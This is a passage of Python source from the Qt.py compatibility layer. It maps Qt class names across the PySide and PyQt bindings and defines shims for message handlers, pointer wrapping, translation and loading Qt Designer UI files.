"QSequentialAnimationGroup",
"QSettings",
"QSignalMapper",
"QSignalTransition",
"QSize",
"QSizeF",
"QSocketNotifier",
"QState",
"QStateMachine",
"QSysInfo",
"QSystemSemaphore",
"QT_TRANSLATE_NOOP",
"QT_TR_NOOP",
"QT_TR_NOOP_UTF8",
"QTemporaryFile",
"QTextBoundaryFinder",
"QTextCodec",
"QTextDecoder",
"QTextEncoder",
"QTextStream",
"QTextStreamManipulator",
"QThread",
"QThreadPool",
"QTime",
"QTimeLine",
"QTimer",
"QTimerEvent",
"QTranslator",
"QUrl",
"QVariantAnimation",
"QWaitCondition",
"QWriteLocker",
"QXmlStreamAttribute",
"QXmlStreamAttributes",
"QXmlStreamEntityDeclaration",
"QXmlStreamEntityResolver",
"QXmlStreamNamespaceDeclaration",
"QXmlStreamNotationDeclaration",
"QXmlStreamReader",
"QXmlStreamWriter",
"Qt",
"QtCriticalMsg",
"QtDebugMsg",
"QtFatalMsg",
"QtMsgType",
"QtSystemMsg",
"QtWarningMsg",
"qAbs",
"qAddPostRoutine",
"qChecksum",
"qCritical",
"qDebug",
"qFatal",
"qFuzzyCompare",
"qIsFinite",
"qIsInf",
"qIsNaN",
"qIsNull",
"qRegisterResourceData",
"qUnregisterResourceData",
"qVersion",
"qWarning",
"qrand",
"qsrand",
],
"QtGui": [
"QAbstractTextDocumentLayout",
"QActionEvent",
"QBitmap",
"QBrush",
"QClipboard",
"QCloseEvent",
"QColor",
"QConicalGradient",
"QContextMenuEvent",
"QCursor",
"QDesktopServices",
"QDoubleValidator",
"QDrag",
"QDragEnterEvent",
"QDragLeaveEvent",
"QDragMoveEvent",
"QDropEvent",
"QFileOpenEvent",
"QFocusEvent",
"QFont",
"QFontDatabase",
"QFontInfo",
"QFontMetrics",
"QFontMetricsF",
"QGradient",
"QHelpEvent",
"QHideEvent",
"QHoverEvent",
"QIcon",
"QIconDragEvent",
"QIconEngine",
"QImage",
"QImageIOHandler",
"QImageReader",
"QImageWriter",
"QInputEvent",
"QInputMethodEvent",
"QIntValidator",
"QKeyEvent",
"QKeySequence",
"QLinearGradient",
"QMatrix2x2",
"QMatrix2x3",
"QMatrix2x4",
"QMatrix3x2",
"QMatrix3x3",
"QMatrix3x4",
"QMatrix4x2",
"QMatrix4x3",
"QMatrix4x4",
"QMouseEvent",
"QMoveEvent",
"QMovie",
"QPaintDevice",
"QPaintEngine",
"QPaintEngineState",
"QPaintEvent",
"QPainter",
"QPainterPath",
"QPainterPathStroker",
"QPalette",
"QPen",
"QPicture",
"QPictureIO",
"QPixmap",
"QPixmapCache",
"QPolygon",
"QPolygonF",
"QQuaternion",
"QRadialGradient",
"QRegExpValidator",
"QRegion",
"QResizeEvent",
"QSessionManager",
"QShortcutEvent",
"QShowEvent",
"QStandardItem",
"QStandardItemModel",
"QStatusTipEvent",
"QSyntaxHighlighter",
"QTabletEvent",
"QTextBlock",
"QTextBlockFormat",
"QTextBlockGroup",
"QTextBlockUserData",
"QTextCharFormat",
"QTextCursor",
"QTextDocument",
"QTextDocumentFragment",
"QTextFormat",
"QTextFragment",
"QTextFrame",
"QTextFrameFormat",
"QTextImageFormat",
"QTextInlineObject",
"QTextItem",
"QTextLayout",
"QTextLength",
"QTextLine",
"QTextList",
"QTextListFormat",
"QTextObject",
"QTextObjectInterface",
"QTextOption",
"QTextTable",
"QTextTableCell",
"QTextTableCellFormat",
"QTextTableFormat",
"QTouchEvent",
"QTransform",
"QValidator",
"QVector2D",
"QVector3D",
"QVector4D",
"QWhatsThisClickedEvent",
"QWheelEvent",
"QWindowStateChangeEvent",
"qAlpha",
"qBlue",
"qGray",
"qGreen",
"qIsGray",
"qRed",
"qRgb",
"qRgba",
],
"QtHelp": [
"QHelpContentItem",
"QHelpContentModel",
"QHelpContentWidget",
"QHelpEngine",
"QHelpEngineCore",
"QHelpIndexModel",
"QHelpIndexWidget",
"QHelpSearchEngine",
"QHelpSearchQuery",
"QHelpSearchQueryWidget",
"QHelpSearchResultWidget",
],
"QtMultimedia": [
"QAbstractVideoBuffer",
"QAbstractVideoSurface",
"QAudio",
"QAudioDeviceInfo",
"QAudioFormat",
"QAudioInput",
"QAudioOutput",
"QVideoFrame",
"QVideoSurfaceFormat",
],
"QtNetwork": [
"QAbstractNetworkCache",
"QAbstractSocket",
"QAuthenticator",
"QHostAddress",
"QHostInfo",
"QLocalServer",
"QLocalSocket",
"QNetworkAccessManager",
"QNetworkAddressEntry",
"QNetworkCacheMetaData",
"QNetworkConfiguration",
"QNetworkConfigurationManager",
"QNetworkCookie",
"QNetworkCookieJar",
"QNetworkDiskCache",
"QNetworkInterface",
"QNetworkProxy",
"QNetworkProxyFactory",
"QNetworkProxyQuery",
"QNetworkReply",
"QNetworkRequest",
"QNetworkSession",
"QSsl",
"QTcpServer",
"QTcpSocket",
"QUdpSocket",
],
"QtOpenGL": ["QGL", "QGLContext", "QGLFormat", "QGLWidget"],
"QtPrintSupport": [
"QAbstractPrintDialog",
"QPageSetupDialog",
"QPrintDialog",
"QPrintEngine",
"QPrintPreviewDialog",
"QPrintPreviewWidget",
"QPrinter",
"QPrinterInfo",
],
"QtSql": [
"QSql",
"QSqlDatabase",
"QSqlDriver",
"QSqlDriverCreatorBase",
"QSqlError",
"QSqlField",
"QSqlIndex",
"QSqlQuery",
"QSqlQueryModel",
"QSqlRecord",
"QSqlRelation",
"QSqlRelationalDelegate",
"QSqlRelationalTableModel",
"QSqlResult",
"QSqlTableModel",
],
"QtSvg": ["QGraphicsSvgItem", "QSvgGenerator", "QSvgRenderer", "QSvgWidget"],
"QtTest": ["QTest"],
"QtWidgets": [
"QAbstractButton",
"QAbstractGraphicsShapeItem",
"QAbstractItemDelegate",
"QAbstractItemView",
"QAbstractScrollArea",
"QAbstractSlider",
"QAbstractSpinBox",
"QAction",
"QActionGroup",
"QApplication",
"QBoxLayout",
"QButtonGroup",
"QCalendarWidget",
"QCheckBox",
"QColorDialog",
"QColumnView",
"QComboBox",
"QCommandLinkButton",
"QCommonStyle",
"QCompleter",
"QDataWidgetMapper",
"QDateEdit",
"QDateTimeEdit",
"QDesktopWidget",
"QDial",
"QDialog",
"QDialogButtonBox",
"QDirModel",
"QDockWidget",
"QDoubleSpinBox",
"QErrorMessage",
"QFileDialog",
"QFileIconProvider",
"QFileSystemModel",
"QFocusFrame",
"QFontComboBox",
"QFontDialog",
"QFormLayout",
"QFrame",
"QGesture",
"QGestureEvent",
"QGestureRecognizer",
"QGraphicsAnchor",
"QGraphicsAnchorLayout",
"QGraphicsBlurEffect",
"QGraphicsColorizeEffect",
"QGraphicsDropShadowEffect",
"QGraphicsEffect",
"QGraphicsEllipseItem",
"QGraphicsGridLayout",
"QGraphicsItem",
"QGraphicsItemGroup",
"QGraphicsLayout",
"QGraphicsLayoutItem",
"QGraphicsLineItem",
"QGraphicsLinearLayout",
"QGraphicsObject",
"QGraphicsOpacityEffect",
"QGraphicsPathItem",
"QGraphicsPixmapItem",
"QGraphicsPolygonItem",
"QGraphicsProxyWidget",
"QGraphicsRectItem",
"QGraphicsRotation",
"QGraphicsScale",
"QGraphicsScene",
"QGraphicsSceneContextMenuEvent",
"QGraphicsSceneDragDropEvent",
"QGraphicsSceneEvent",
"QGraphicsSceneHelpEvent",
"QGraphicsSceneHoverEvent",
"QGraphicsSceneMouseEvent",
"QGraphicsSceneMoveEvent",
"QGraphicsSceneResizeEvent",
"QGraphicsSceneWheelEvent",
"QGraphicsSimpleTextItem",
"QGraphicsTextItem",
"QGraphicsTransform",
"QGraphicsView",
"QGraphicsWidget",
"QGridLayout",
"QGroupBox",
"QHBoxLayout",
"QHeaderView",
"QInputDialog",
"QItemDelegate",
"QItemEditorCreatorBase",
"QItemEditorFactory",
"QKeyEventTransition",
"QLCDNumber",
"QLabel",
"QLayout",
"QLayoutItem",
"QLineEdit",
"QListView",
"QListWidget",
"QListWidgetItem",
"QMainWindow",
"QMdiArea",
"QMdiSubWindow",
"QMenu",
"QMenuBar",
"QMessageBox",
"QMouseEventTransition",
"QPanGesture",
"QPinchGesture",
"QPlainTextDocumentLayout",
"QPlainTextEdit",
"QProgressBar",
"QProgressDialog",
"QPushButton",
"QRadioButton",
"QRubberBand",
"QScrollArea",
"QScrollBar",
"QShortcut",
"QSizeGrip",
"QSizePolicy",
"QSlider",
"QSpacerItem",
"QSpinBox",
"QSplashScreen",
"QSplitter",
"QSplitterHandle",
"QStackedLayout",
"QStackedWidget",
"QStatusBar",
"QStyle",
"QStyleFactory",
"QStyleHintReturn",
"QStyleHintReturnMask",
"QStyleHintReturnVariant",
"QStyleOption",
"QStyleOptionButton",
"QStyleOptionComboBox",
"QStyleOptionComplex",
"QStyleOptionDockWidget",
"QStyleOptionFocusRect",
"QStyleOptionFrame",
"QStyleOptionGraphicsItem",
"QStyleOptionGroupBox",
"QStyleOptionHeader",
"QStyleOptionMenuItem",
"QStyleOptionProgressBar",
"QStyleOptionRubberBand",
"QStyleOptionSizeGrip",
"QStyleOptionSlider",
"QStyleOptionSpinBox",
"QStyleOptionTab",
"QStyleOptionTabBarBase",
"QStyleOptionTabWidgetFrame",
"QStyleOptionTitleBar",
"QStyleOptionToolBar",
"QStyleOptionToolBox",
"QStyleOptionToolButton",
"QStyleOptionViewItem",
"QStylePainter",
"QStyledItemDelegate",
"QSwipeGesture",
"QSystemTrayIcon",
"QTabBar",
"QTabWidget",
"QTableView",
"QTableWidget",
"QTableWidgetItem",
"QTableWidgetSelectionRange",
"QTapAndHoldGesture",
"QTapGesture",
"QTextBrowser",
"QTextEdit",
"QTimeEdit",
"QToolBar",
"QToolBox",
"QToolButton",
"QToolTip",
"QTreeView",
"QTreeWidget",
"QTreeWidgetItem",
"QTreeWidgetItemIterator",
"QUndoCommand",
"QUndoGroup",
"QUndoStack",
"QUndoView",
"QVBoxLayout",
"QWhatsThis",
"QWidget",
"QWidgetAction",
"QWidgetItem",
"QWizard",
"QWizardPage",
],
"QtX11Extras": ["QX11Info"],
"QtXml": [
"QDomAttr",
"QDomCDATASection",
"QDomCharacterData",
"QDomComment",
"QDomDocument",
"QDomDocumentFragment",
"QDomDocumentType",
"QDomElement",
"QDomEntity",
"QDomEntityReference",
"QDomImplementation",
"QDomNamedNodeMap",
"QDomNode",
"QDomNodeList",
"QDomNotation",
"QDomProcessingInstruction",
"QDomText",
"QXmlAttributes",
"QXmlContentHandler",
"QXmlDTDHandler",
"QXmlDeclHandler",
"QXmlDefaultHandler",
"QXmlEntityResolver",
"QXmlErrorHandler",
"QXmlInputSource",
"QXmlLexicalHandler",
"QXmlLocator",
"QXmlNamespaceSupport",
"QXmlParseException",
"QXmlReader",
"QXmlSimpleReader",
],
"QtXmlPatterns": [
"QAbstractMessageHandler",
"QAbstractUriResolver",
"QAbstractXmlNodeModel",
"QAbstractXmlReceiver",
"QSourceLocation",
"QXmlFormatter",
"QXmlItem",
"QXmlName",
"QXmlNamePool",
"QXmlNodeModelIndex",
"QXmlQuery",
"QXmlResultItems",
"QXmlSchema",
"QXmlSchemaValidator",
"QXmlSerializer",
],
}
""" Missing members
This mapping describes members that have been deprecated
in one or more bindings and have been left out of the
_common_members mapping.
The member can provide an extra details string to be
included in exceptions and warnings.
"""
_missing_members = {
"QtGui": {
"QMatrix": "Deprecated in PyQt5",
},
}
def _qInstallMessageHandler(handler):
"""Install a message handler that works in all bindings
Args:
handler: A function that takes 3 arguments, or None
"""
def messageOutputHandler(*args):
# In Qt4 bindings, message handlers are passed 2 arguments
# In Qt5 bindings, message handlers are passed 3 arguments
# The first argument is a QtMsgType
# The last argument is the message to be printed
        # The middle argument (if passed) is a QMessageLogContext
if len(args) == 3:
msgType, logContext, msg = args
elif len(args) == 2:
msgType, msg = args
logContext = None
else:
raise TypeError(
"handler expected 2 or 3 arguments, got {0}".format(len(args))
)
if isinstance(msg, bytes):
# In python 3, some bindings pass a bytestring, which cannot be
# used elsewhere. Decoding a python 2 or 3 bytestring object will
# consistently return a unicode object.
msg = msg.decode()
handler(msgType, logContext, msg)
passObject = messageOutputHandler if handler else handler
if Qt.IsPySide or Qt.IsPyQt4:
return Qt._QtCore.qInstallMsgHandler(passObject)
elif Qt.IsPySide2 or Qt.IsPyQt5:
return Qt._QtCore.qInstallMessageHandler(passObject)
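# A hedged usage sketch (illustration only; assumes a binding has been
# resolved so the Qt.IsPySide*/IsPyQt* flags are set, and that QtCompat
# exposes this shim as qInstallMessageHandler, as in upstream Qt.py):
#
#   def my_handler(msg_type, log_context, message):
#       print("Qt says: %s" % message)
#
#   Qt.QtCompat.qInstallMessageHandler(my_handler)  # route Qt messages
#   Qt.QtCompat.qInstallMessageHandler(None)        # restore the default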
def _getcpppointer(object):
if hasattr(Qt, "_shiboken2"):
return getattr(Qt, "_shiboken2").getCppPointer(object)[0]
elif hasattr(Qt, "_shiboken"):
return getattr(Qt, "_shiboken").getCppPointer(object)[0]
elif hasattr(Qt, "_sip"):
return getattr(Qt, "_sip").unwrapinstance(object)
raise AttributeError("'module' has no attribute 'getCppPointer'")
def _wrapinstance(ptr, base=None):
"""Enable implicit cast of pointer to most suitable class
    This behaviour is available in sip by default.
Based on http://nathanhorne.com/pyqtpyside-wrap-instance
Usage:
This mechanism kicks in under these circumstances.
1. Qt.py is using PySide 1 or 2.
2. A `base` argument is not provided.
See :func:`QtCompat.wrapInstance()`
Arguments:
ptr (long): Pointer to QObject in memory
base (QObject, optional): Base class to wrap with. Defaults to QObject,
which should handle anything.
"""
assert isinstance(ptr, long), "Argument 'ptr' must be of type <long>"
assert (base is None) or issubclass(
base, Qt.QtCore.QObject
), "Argument 'base' must be of type <QObject>"
if Qt.IsPyQt4 or Qt.IsPyQt5:
func = getattr(Qt, "_sip").wrapinstance
elif Qt.IsPySide2:
func = getattr(Qt, "_shiboken2").wrapInstance
elif Qt.IsPySide:
func = getattr(Qt, "_shiboken").wrapInstance
else:
raise AttributeError("'module' has no attribute 'wrapInstance'")
if base is None:
if Qt.IsPyQt4 or Qt.IsPyQt5:
base = Qt.QtCore.QObject
else:
q_object = func(long(ptr), Qt.QtCore.QObject)
meta_object = q_object.metaObject()
while True:
class_name = meta_object.className()
try:
base = getattr(Qt.QtWidgets, class_name)
except AttributeError:
try:
base = getattr(Qt.QtCore, class_name)
except AttributeError:
meta_object = meta_object.superClass()
continue
break
return func(long(ptr), base)
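# A hedged sketch of the implicit cast documented above (names invented;
# assumes the QtCompat wiring of upstream Qt.py):
#
#   ptr = QtCompat.getCppPointer(some_widget)   # raw pointer as a long
#   widget = QtCompat.wrapInstance(long(ptr))   # no `base` given: under
#                                               # PySide(2) the most derived
#                                               # wrapper class is resolved
#                                               # by walking the QMetaObject
#                                               # hierarchy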
def _isvalid(object):
"""Check if the object is valid to use in Python runtime.
Usage:
See :func:`QtCompat.isValid()`
Arguments:
object (QObject): QObject to check the validity of.
"""
assert isinstance(object, Qt.QtCore.QObject)
if hasattr(Qt, "_shiboken2"):
return getattr(Qt, "_shiboken2").isValid(object)
elif hasattr(Qt, "_shiboken"):
return getattr(Qt, "_shiboken").isValid(object)
elif hasattr(Qt, "_sip"):
return not getattr(Qt, "_sip").isdeleted(object)
else:
raise AttributeError("'module' has no attribute isValid")
def _translate(context, sourceText, *args):
# In Qt4 bindings, translate can be passed 2 or 3 arguments
# In Qt5 bindings, translate can be passed 2 arguments
# The first argument is disambiguation[str]
# The last argument is n[int]
# The middle argument can be encoding[QtCore.QCoreApplication.Encoding]
if len(args) == 3:
disambiguation, encoding, n = args
elif len(args) == 2:
disambiguation, n = args
encoding = None
else:
raise TypeError("Expected 4 or 5 arguments, got {0}.".format(len(args) + 2))
if hasattr(Qt.QtCore, "QCoreApplication"):
app = getattr(Qt.QtCore, "QCoreApplication")
else:
raise NotImplementedError(
"Missing QCoreApplication implementation for {binding}".format(
binding=Qt.__binding__,
)
)
if Qt.__binding__ in ("PySide2", "PyQt5"):
sanitized_args = [context, sourceText, disambiguation, n]
else:
sanitized_args = [
context,
sourceText,
disambiguation,
encoding or app.CodecForTr,
n,
]
return app.translate(*sanitized_args)
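# Example (sketch): QtCompat.translate exposes one signature on all bindings;
# the encoding argument is supplied internally for Qt4-era bindings:
#
#   from Qt import QtCompat
#
#   text = QtCompat.translate("MainWindow", "Hello", None, -1)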
def _loadUi(uifile, baseinstance=None):
"""Dynamically load a user interface from the given `uifile`
This function calls `uic.loadUi` if using PyQt bindings,
else it implements a comparable binding for PySide.
Documentation:
http://pyqt.sourceforge.net/Docs/PyQt5/designer.html#PyQt5.uic.loadUi
Arguments:
uifile (str): Absolute path to Qt Designer file.
baseinstance (QWidget): Instantiated QWidget or subclass thereof
Return:
baseinstance if `baseinstance` is not `None`. Otherwise
return the newly created instance of the user interface.
"""
if hasattr(Qt, "_uic"):
return Qt._uic.loadUi(uifile, baseinstance)
elif hasattr(Qt, "_QtUiTools"):
# Implement `PyQt5.uic.loadUi` for PySide(2)
class _UiLoader(Qt._QtUiTools.QUiLoader):
"""Create the user interface in a base instance.
Unlike `Qt._QtUiTools.QUiLoader` itself this class does not
create a new instance of the top-level widget, but creates the user
interface in an existing instance of the top-level class if needed.
This mimics the behaviour of `PyQt5.uic.loadUi`.
"""
def __init__(self, baseinstance):
super(_UiLoader, self).__init__(baseinstance)
self.baseinstance = baseinstance
self.custom_widgets = {}
def _loadCustomWidgets(self, etree):
"""
                Workaround for the PYSIDE-77 bug.
                According to the QUiLoader documentation we should use the
                registerCustomWidget method, but that segfaults on some
                platforms. Instead we fetch the Python class objects from
                the customwidgets DOM node, so createWidget can use them
                directly.
"""
def headerToModule(header):
"""
Translate a header file to python module path
foo/bar.h => foo.bar
"""
# Remove header extension
module = os.path.splitext(header)[0]
# Replace os separator by python module separator
return module.replace("/", ".").replace("\\", ".")
custom_widgets = etree.find("customwidgets")
if custom_widgets is None:
return
for custom_widget in custom_widgets:
class_name = custom_widget.find("class").text
header = custom_widget.find("header").text
module = importlib.import_module(headerToModule(header))
self.custom_widgets[class_name] = getattr(module, class_name)
def load(self, uifile, *args, **kwargs):
from xml.etree.ElementTree import ElementTree
# For whatever reason, if this doesn't happen then
# reading an invalid or non-existing .ui file throws
# a RuntimeError.
etree = ElementTree()
etree.parse(uifile)
self._loadCustomWidgets(etree)
widget = Qt._QtUiTools.QUiLoader.load(self, uifile, *args, **kwargs)
# Workaround for PySide 1.0.9, see issue #208
widget.parentWidget()
return widget
def createWidget(self, class_name, parent=None, name=""):
"""Called for each widget defined in ui file
Overridden here to populate `baseinstance` instead.
"""
if parent is None and self.baseinstance:
# Supposed to create the top-level widget,
# return the base instance instead
return self.baseinstance
# For some reason, Line is not in the list of available
# widgets, but works fine, so we have to special case it here.
if class_name in self.availableWidgets() + ["Line"]:
# Create a new widget for child widgets
widget = Qt._QtUiTools.QUiLoader.createWidget(
self, class_name, parent, name
)
elif class_name in self.custom_widgets:
widget = self.custom_widgets[class_name](parent=parent)
else:
raise Exception("Custom widget '%s' not supported" % class_name)
if self.baseinstance:
# Set an attribute for the new child widget on the base
# instance, just like PyQt5.uic.loadUi does.
setattr(self.baseinstance, name, widget)
return widget
widget = _UiLoader(baseinstance).load(uifile)
Qt.QtCore.QMetaObject.connectSlotsByName(widget)
return widget
else:
raise NotImplementedError("No implementation available for loadUi")
"""Misplaced members
These members from the original submodule are misplaced relative to PySide2
"""
_misplaced_members = {
"PySide2": {
"QtCore.QStringListModel": "QtCore.QStringListModel",
"QtGui.QStringListModel": "QtCore.QStringListModel",
"QtCore.Property": "QtCore.Property",
"QtCore.Signal": "QtCore.Signal",
"QtCore.Slot": "QtCore.Slot",
"QtCore.QAbstractProxyModel": "QtCore.QAbstractProxyModel",
"QtCore.QSortFilterProxyModel": "QtCore.QSortFilterProxyModel",
"QtCore.QItemSelection": "QtCore.QItemSelection",
"QtCore.QItemSelectionModel": "QtCore.QItemSelectionModel",
"QtCore.QItemSelectionRange": "QtCore.QItemSelectionRange",
"QtUiTools.QUiLoader": ["QtCompat.loadUi", _loadUi],
"shiboken2.wrapInstance": ["QtCompat.wrapInstance", _wrapinstance],
"shiboken2.getCppPointer": ["QtCompat.getCppPointer", _getcpppointer],
"shiboken2.isValid": ["QtCompat.isValid", _isvalid],
"QtWidgets.qApp": "QtWidgets.QApplication.instance()",
"QtCore.QCoreApplication.translate": ["QtCompat.translate", _translate],
"QtWidgets.QApplication.translate": ["QtCompat.translate", _translate],
"QtCore.qInstallMessageHandler": [
"QtCompat.qInstallMessageHandler",
_qInstallMessageHandler,
],
"QtWidgets.QStyleOptionViewItem": "QtCompat.QStyleOptionViewItemV4",
},
"PyQt5": {
"QtCore.pyqtProperty": "QtCore.Property",
"QtCore.pyqtSignal": "QtCore.Signal",
"QtCore.pyqtSlot": "QtCore.Slot",
"QtCore.QAbstractProxyModel": "QtCore.QAbstractProxyModel",
"QtCore.QSortFilterProxyModel": "QtCore.QSortFilterProxyModel",
"QtCore.QStringListModel": "QtCore.QStringListModel",
"QtCore.QItemSelection": "QtCore.QItemSelection",
"QtCore.QItemSelectionModel": "QtCore.QItemSelectionModel",
"QtCore.QItemSelectionRange": "QtCore.QItemSelectionRange",
"uic.loadUi": ["QtCompat.loadUi", _loadUi],
"sip.wrapinstance": ["QtCompat.wrapInstance", _wrapinstance],
"sip.unwrapinstance": ["QtCompat.getCppPointer", _getcpppointer],
"sip.isdeleted": ["QtCompat.isValid", _isvalid],
"QtWidgets.qApp": "QtWidgets.QApplication.instance()",
"QtCore.QCoreApplication.translate": ["QtCompat.translate", _translate],
"QtWidgets.QApplication.translate": ["QtCompat.translate", _translate],
"QtCore.qInstallMessageHandler": [
"QtCompat.qInstallMessageHandler",
_qInstallMessageHandler,
],
"QtWidgets.QStyleOptionViewItem": "QtCompat.QStyleOptionViewItemV4",
},
"PySide": {
"QtGui.QAbstractProxyModel": "QtCore.QAbstractProxyModel",
"QtGui.QSortFilterProxyModel": "QtCore.QSortFilterProxyModel",
"QtGui.QStringListModel": "QtCore.QStringListModel",
"QtGui.QItemSelection": "QtCore.QItemSelection",
"QtGui.QItemSelectionModel": "QtCore.QItemSelectionModel",
"QtCore.Property": "QtCore.Property",
"QtCore.Signal": "QtCore.Signal",
"QtCore.Slot": "QtCore.Slot",
"QtGui.QItemSelectionRange": "QtCore.QItemSelectionRange",
"QtGui.QAbstractPrintDialog": "QtPrintSupport.QAbstractPrintDialog",
"QtGui.QPageSetupDialog": "QtPrintSupport.QPageSetupDialog",
"QtGui.QPrintDialog": "QtPrintSupport.QPrintDialog",
"QtGui.QPrintEngine": "QtPrintSupport.QPrintEngine",
"QtGui.QPrintPreviewDialog": "QtPrintSupport.QPrintPreviewDialog",
"QtGui.QPrintPreviewWidget": "QtPrintSupport.QPrintPreviewWidget",
"QtGui.QPrinter": "QtPrintSupport.QPrinter",
"QtGui.QPrinterInfo": "QtPrintSupport.QPrinterInfo",
"QtUiTools.QUiLoader": ["QtCompat.loadUi", _loadUi],
"shiboken.wrapInstance": ["QtCompat.wrapInstance", _wrapinstance],
"shiboken.unwrapInstance": ["QtCompat.getCppPointer", _getcpppointer],
"shiboken.isValid": ["QtCompat.isValid", _isvalid],
"QtGui.qApp": "QtWidgets.QApplication.instance()",
"QtCore.QCoreApplication.translate": ["QtCompat.translate", _translate],
"QtGui.QApplication.translate": ["QtCompat.translate", _translate],
"QtCore.qInstallMsgHandler": [
"QtCompat.qInstallMessageHandler",
_qInstallMessageHandler,
],
"QtGui.QStyleOptionViewItemV4": "QtCompat.QStyleOptionViewItemV4",
},
"PyQt4": {
"QtGui.QAbstractProxyModel": "QtCore.QAbstractProxyModel",
"QtGui.QSortFilterProxyModel": "QtCore.QSortFilterProxyModel",
"QtGui.QItemSelection": "QtCore.QItemSelection",
"QtGui.QStringListModel": "QtCore.QStringListModel",
"QtGui.QItemSelectionModel": "QtCore.QItemSelectionModel",
"QtCore.pyqtProperty": "QtCore.Property",
"QtCore.pyqtSignal": "QtCore.Signal",
"QtCore.pyqtSlot": "QtCore.Slot",
"QtGui.QItemSelectionRange": "QtCore.QItemSelectionRange",
"QtGui.QAbstractPrintDialog": "QtPrintSupport.QAbstractPrintDialog",
"QtGui.QPageSetupDialog": "QtPrintSupport.QPageSetupDialog",
"QtGui.QPrintDialog": "QtPrintSupport.QPrintDialog",
"QtGui.QPrintEngine": "QtPrintSupport.QPrintEngine",
"QtGui.QPrintPreviewDialog": "QtPrintSupport.QPrintPreviewDialog",
"QtGui.QPrintPreviewWidget": "QtPrintSupport.QPrintPreviewWidget",
"QtGui.QPrinter": "QtPrintSupport.QPrinter",
"QtGui.QPrinterInfo": "QtPrintSupport.QPrinterInfo",
# "QtCore.pyqtSignature": "QtCore.Slot",
"uic.loadUi": ["QtCompat.loadUi", _loadUi],
"sip.wrapinstance": ["QtCompat.wrapInstance", _wrapinstance],
"sip.unwrapinstance": ["QtCompat.getCppPointer", _getcpppointer],
"sip.isdeleted": ["QtCompat.isValid", _isvalid],
"QtCore.QString": "str",
"QtGui.qApp": "QtWidgets.QApplication.instance()",
"QtCore.QCoreApplication.translate": ["QtCompat.translate", _translate],
"QtGui.QApplication.translate": ["QtCompat.translate", _translate],
"QtCore.qInstallMsgHandler": [
"QtCompat.qInstallMessageHandler",
_qInstallMessageHandler,
],
"QtGui.QStyleOptionViewItemV4": "QtCompat.QStyleOptionViewItemV4",
},
}
""" Compatibility Members
This dictionary is used to build Qt.QtCompat objects that provide a consistent
interface for obsolete members and smooth over differences in binding
return values.
{
"binding": {
"classname": {
"targetname": "binding_namespace",
}
}
}
"""
_compatibility_members = {
"PySide2": {
"QWidget": {
"grab": "QtWidgets.QWidget.grab",
},
"QHeaderView": {
"sectionsClickable": "QtWidgets.QHeaderView.sectionsClickable",
"setSectionsClickable": "QtWidgets.QHeaderView.setSectionsClickable",
"sectionResizeMode": "QtWidgets.QHeaderView.sectionResizeMode",
"setSectionResizeMode": "QtWidgets.QHeaderView.setSectionResizeMode",
"sectionsMovable": "QtWidgets.QHeaderView.sectionsMovable",
"setSectionsMovable": "QtWidgets.QHeaderView.setSectionsMovable",
},
"QFileDialog": {
"getOpenFileName": "QtWidgets.QFileDialog.getOpenFileName",
"getOpenFileNames": "QtWidgets.QFileDialog.getOpenFileNames",
"getSaveFileName": "QtWidgets.QFileDialog.getSaveFileName",
},
},
"PyQt5": {
"QWidget": {
"grab": "QtWidgets.QWidget.grab",
},
"QHeaderView": {
"sectionsClickable": "QtWidgets.QHeaderView.sectionsClickable",
"setSectionsClickable": "QtWidgets.QHeaderView.setSectionsClickable",
"sectionResizeMode": "QtWidgets.QHeaderView.sectionResizeMode",
"setSectionResizeMode": "QtWidgets.QHeaderView.setSectionResizeMode",
"sectionsMovable": "QtWidgets.QHeaderView.sectionsMovable",
"setSectionsMovable": "QtWidgets.QHeaderView.setSectionsMovable",
},
"QFileDialog": {
"getOpenFileName": "QtWidgets.QFileDialog.getOpenFileName",
"getOpenFileNames": "QtWidgets.QFileDialog.getOpenFileNames",
"getSaveFileName": "QtWidgets.QFileDialog.getSaveFileName",
},
},
"PySide": {
"QWidget": {
"grab": "QtWidgets.QPixmap.grabWidget",
},
"QHeaderView": {
"sectionsClickable": "QtWidgets.QHeaderView.isClickable",
"setSectionsClickable": "QtWidgets.QHeaderView.setClickable",
"sectionResizeMode": "QtWidgets.QHeaderView.resizeMode",
"setSectionResizeMode": "QtWidgets.QHeaderView.setResizeMode",
"sectionsMovable": "QtWidgets.QHeaderView.isMovable",
"setSectionsMovable": "QtWidgets.QHeaderView.setMovable",
},
"QFileDialog": {
"getOpenFileName": "QtWidgets.QFileDialog.getOpenFileName",
"getOpenFileNames": "QtWidgets.QFileDialog.getOpenFileNames",
"getSaveFileName": "QtWidgets.QFileDialog.getSaveFileName",
},
},
"PyQt4": {
"QWidget": {
"grab": "QtWidgets.QPixmap.grabWidget",
},
"QHeaderView": {
"sectionsClickable": "QtWidgets.QHeaderView.isClickable",
"setSectionsClickable": "QtWidgets.QHeaderView.setClickable",
"sectionResizeMode": "QtWidgets.QHeaderView.resizeMode",
"setSectionResizeMode": "QtWidgets.QHeaderView.setResizeMode",
"sectionsMovable": "QtWidgets.QHeaderView.isMovable",
"setSectionsMovable": "QtWidgets.QHeaderView.setMovable",
},
"QFileDialog": {
"getOpenFileName": "QtWidgets.QFileDialog.getOpenFileName",
"getOpenFileNames": "QtWidgets.QFileDialog.getOpenFileNames",
"getSaveFileName": "QtWidgets.QFileDialog.getSaveFileName",
},
},
}
def _apply_site_config():
try:
import QtSiteConfig
except ImportError:
# If no QtSiteConfig module found, no modifications
# to _common_members are needed.
pass
else:
# Provide the ability to modify the dicts used to build Qt.py
if hasattr(QtSiteConfig, "update_members"):
QtSiteConfig.update_members(_common_members)
if hasattr(QtSiteConfig, "update_misplaced_members"):
QtSiteConfig.update_misplaced_members(members=_misplaced_members)
if hasattr(QtSiteConfig, "update_compatibility_members"):
QtSiteConfig.update_compatibility_members(members=_compatibility_members)
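# Example (sketch, assuming a hypothetical QtSiteConfig.py on sys.path): each
# hook is optional, and each mutates the given dict in place before Qt.py is
# assembled:
#
#   # QtSiteConfig.py
#   def update_members(members):
#       # e.g. drop a submodule this site never uses
#       members.pop("QtXml", None)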
def _new_module(name):
return types.ModuleType(__name__ + "." + name)
def _import_sub_module(module, name):
"""import_sub_module will mimic the function of importlib.import_module"""
module = __import__(module.__name__ + "." + name)
for level in name.split("."):
module = getattr(module, level)
return module
def _setup(module, extras):
"""Install common submodules"""
Qt.__binding__ = module.__name__
def _warn_import_error(exc, module):
msg = str(exc)
if "No module named" in msg:
return
_warn("ImportError(%s): %s" % (module, msg))
for name in list(_common_members) + extras:
try:
submodule = _import_sub_module(module, name)
except ImportError as e:
try:
# For extra modules like sip and shiboken that may not be
# children of the binding.
submodule = __import__(name)
